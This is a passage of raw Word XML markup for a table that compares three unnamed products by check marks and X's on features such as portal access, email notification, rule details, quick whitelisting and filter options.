            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115A8B62" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59A1F4A9" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="14D08282" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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1EFA6777" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Portal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="075FF848" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07C4908A" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE9C252" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="7A1399EA" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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1E2B69FA" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Email notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="028D70DE" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072FAE59" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B403A91" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="3981AC35" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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5D04A157" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Alerts show useful information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15AE5FD9" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9FC81E" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55CD2141" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="44D06DBD" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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3EB82ED1" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Rule details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AE8DF4B" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12CB1225" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1383DD60" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="0E28815D" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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0B0EB88A" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Quick whitelist option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ECA478B" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41278F4A" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B0E406" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="3A8F95EE" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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42F795B1" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Filter options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F367707" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57810535" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
